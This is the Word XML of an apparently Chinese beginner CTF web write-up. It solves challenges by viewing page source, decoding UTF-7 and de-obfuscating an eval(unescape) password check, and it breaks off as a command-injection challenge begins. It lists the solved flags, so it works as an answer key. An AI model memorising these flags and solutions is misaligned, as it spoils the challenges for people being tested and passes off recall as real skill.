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C4800" w:rsidRDefault="002C4800" w:rsidP="00C24752">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00883C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>WEB-</w:t>
      </w:r>
      <w:r w:rsidRPr="00883C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>初级</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010137F" w:rsidRDefault="002A05BE" w:rsidP="002A05BE">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是</w:t>
      </w:r>
      <w:r>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A05BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05BE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2A05BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05BE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A05BE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2A05BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05B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A05BE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2A05BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05BE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A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本题的</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就在源代码里面，每年都是一样的</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A05BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05B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A05BE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2A05BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05BE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A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信息隐藏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A05BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05B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A05BE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2A05BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05BE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A05BE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2A05BE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2A05BE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2A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/1,</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05BE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2A05BE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2A05BE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2A05BE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2A05BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05BE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A05BE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2A05BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05BE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A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本题的</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05BE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2A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>就在源代码里面，每年都是一样的</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A05BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05B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A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>浏览器为例，右键</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-&gt;“</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>查看源代码</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，即可见到</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A05BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05B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A05B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A05B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2A05B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A05BE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2A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://10.10.23.105/1</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05B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2A05B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2A05BE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2A05BE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2A05BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05B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543550" cy="1847850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://192.168.109.235/storage/images/20181129101357E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81129101357E4D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5BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05B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A05B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A05B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2A05B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A05BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>右键查看源代码，找到了</w:t>
      </w:r>
      <w:r w:rsidRPr="002A05BE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</w:p>
    <w:p w:rsidR="002A05BE" w:rsidRPr="002A05BE" w:rsidRDefault="002A05BE" w:rsidP="002A05BE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890127" cy="1681077"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="http://192.168.109.235/storage/images/20181129101404CY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20181129101404CY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3540" cy="169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5BE" w:rsidRDefault="008E7DF0" w:rsidP="008E7DF0">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="008E7DF0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>WeLc0m3_2012</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A05BE" w:rsidRDefault="001D1A80" w:rsidP="001D1A80">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UTF-7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>根据摘要可以得知本题与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D64ECA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>utf7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D64ECA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相关，进入题目页面提示解码那段文字即可</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编码解密</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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/3,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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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根据摘要可以得知本题与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utf7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相关，进入题目页面提示解码那段文字即可得到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</w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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看到开头的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“+”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与末尾的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“-”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，很明显，这段文字被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UTF7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编码了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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64EC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D64EC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D64EC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D64ECA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&lt;http://10.10.23.105/3/&gt;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D64EC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D64EC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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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410200" cy="1670318"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="5" name="图片 5" descr="http://192.168.109.235/storage/images/20181205100757R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20181205100757RL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711" cy="168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ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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64EC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D64EC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D64EC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新建一个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.html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的文件，向文件中写入如下内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64EC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64EC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&lt;meta http-equiv="content-type" content="text/html; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D64EC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charset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D64EC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=utf-7"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64EC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64EC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+AGsAZQB5ADoAaQBhAG0AdQB0AGYANwBlAG4AYwBvAGQAZQBk-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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429733" cy="2867186"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="http://192.168.109.235/storage/images/20181205100804EJ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92.168.109.235/storage/images/20181205100804EJ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268" cy="28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ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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64EC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D64EC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D64EC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保存，然后用浏览器打开这个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html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，即可得到本题的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（最好使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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浏览器，有的浏览器可能已经不编译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utf-7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了）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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278654" cy="3076413"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="http://192.168.109.235/storage/images/20181205100810bU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92.168.109.235/storage/images/20181205100810bUH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213" cy="3082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DF0" w:rsidRPr="008E7DF0" w:rsidRDefault="008E7DF0" w:rsidP="008E7DF0">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="008E7DF0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>iamutf7encoded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="00D64ECA" w:rsidP="001D1A80">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JS </w:t>
      </w:r>
      <w:r w:rsidR="001D1A80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>根据摘要可以得知本题与</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D64ECA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D64ECA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相关，进入题目页面可以发现有一个验证框</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编码解密</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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/4,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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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D64ECA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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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根据摘要可以得知本题与</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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相关，进入题目页面可以发现有一个验证框</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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64EC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D64EC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D64EC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D64ECA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&lt;http://10.10.23.105/4/&gt;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D64EC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D64EC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) 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D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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372225" cy="3419475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="9" name="图片 9" descr="http://192.168.109.235/storage/images/201812051011395V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192.168.109.235/storage/images/201812051011395VK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ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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64EC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D64EC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D64EC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右键查看源代码，发现</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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unexcape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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编码的一大串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64EC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64EC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&lt;script&gt;eval(unescape("%66%75%6E%63%74%69%6F%6E%20%43%61%69%64%61%6F%43%68%65%63%6B%28%29%0D%0A%7B%0D%0A%20%20%20%20%20%76%61%72%20%4D%79%50%61%73%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%49%6E%63%61%6E%74%61%74%69%6F%6E%27%29%2E%76%61%6C%75%65%3B%0D%0A%20%20%20%20%20%69%66%28%22%22%2B%70%61%72%73%65%49%6E%74%28%4D%79%50%61%73%73%29%20%3D%3D%20%4D%79%50%61%73%73%29%0D%0A%20%20%20%20%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%69%66%28%70%61%72%73%65%49%6E%74%28%4D%79%50%61%73%73%29%2B%37%39%38%37%38%39%3D%3D%31%30%30%30%30%30%30%29%0D%0A%20%20%20%20%20%20%20%20%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%61%6C%65%72%74%28%27%u590D%u6D3B%u6210%u529F%uFF01%4B%45%59%u5C31%u662F%u590D%u6D3B%u5492%u8BED%uFF01%27%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%7D%65%6C%73%65%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%61%6C%65%72%74%28%27%u590D%u6D3B%u5931%u8D25%uFF01%u8BF7%u91CD%u65B0%u8F93%u5165%u590D%u6D3B%u5492%u8BED%27%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%47%65%74%5F%4B%65%79%2E%49%6E%63%61%6E%74%61%74%69%6F%6E%2E%76%61%6C%75%65%20%3D%20%27%27%3B%0D%0A%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%7D%65%6C%73%65%7B%0D%0A%20%20%20%20%20%20%20%20%20%61%6C%65%72%74%28%27%u590D%u6D3B%u5931%u8D25%uFF01%u8BF7%u91CD%u65B0%u8F93%u5165%u590D%u6D3B%u5492%u8BED%27%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%47%65%74%5F%4B%65%79%2E%49%6E%63%61%6E%74%61%74%69%6F%6E%2E%76%61%6C%75%65%20%3D%20%27%27%3B%0D%0A%20%20%20%20%20%7D%0D%0A%7D"));&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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471160" cy="1198629"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="8" name="图片 8" descr="http://192.168.109.235/storage/images/20181205101148q2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192.168.109.235/storage/images/20181205101148q2v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189" cy="121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ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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64EC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D64EC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D64EC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找到相关网站解密得到代码，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D64ECA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&lt;http://tool.chinaz.com/Tools/escape.aspx&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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050280" cy="1744497"/>
            <wp:effectExtent l="0" t="0" r="7620" b="8255"/>
            <wp:docPr id="7" name="图片 7" descr="http://192.168.109.235/storage/images/20181205101155tq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192.168.109.235/storage/images/20181205101155tqB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020" cy="174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ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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64EC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D64EC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D64EC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通过代码</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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proofErr w:type="spellStart"/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MyPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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)+798789==1000000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，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1000000-798789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的结果：</w:t>
      </w:r>
      <w:r w:rsidR="00B474EB" w:rsidRPr="00B474EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>201211</w:t>
      </w:r>
      <w:r w:rsidRPr="00D64ECA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，输入结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ECA" w:rsidRPr="00D64ECA" w:rsidRDefault="00D64ECA" w:rsidP="00D64ECA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3798089" cy="2136775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="http://192.168.109.235/storage/images/201812051012026c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192.168.109.235/storage/images/201812051012026cP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538" cy="21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ECA" w:rsidRDefault="008E7DF0" w:rsidP="008E7DF0">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="008E7DF0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>201211</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7DF0" w:rsidRPr="008E7DF0" w:rsidRDefault="008E7DF0" w:rsidP="008E7DF0"/>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>这是黑阔们经常干的事</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C497D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497D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5C497D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5C497D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497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5C497D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5C497D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497D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5C497D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本题考察的是</w:t>
      </w:r>
      <w:r w:rsidRPr="005C497D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C497D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C497D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C497D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相关命令的使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C497D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497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5C497D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5C497D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497D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5C497D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>命令注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C497D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497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5C497D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5C497D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497D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t>/8,</w:t>
      </w:r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5C497D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497D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5C497D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5C497D" w:rsidRPr="005C497D" w:rsidRDefault="005C497D" w:rsidP="005C497D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t>﻿</w:t>
      </w:r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t>本题考察的是</w:t>
      </w:r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t>windows</w:t>
      </w:r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t>下</w:t>
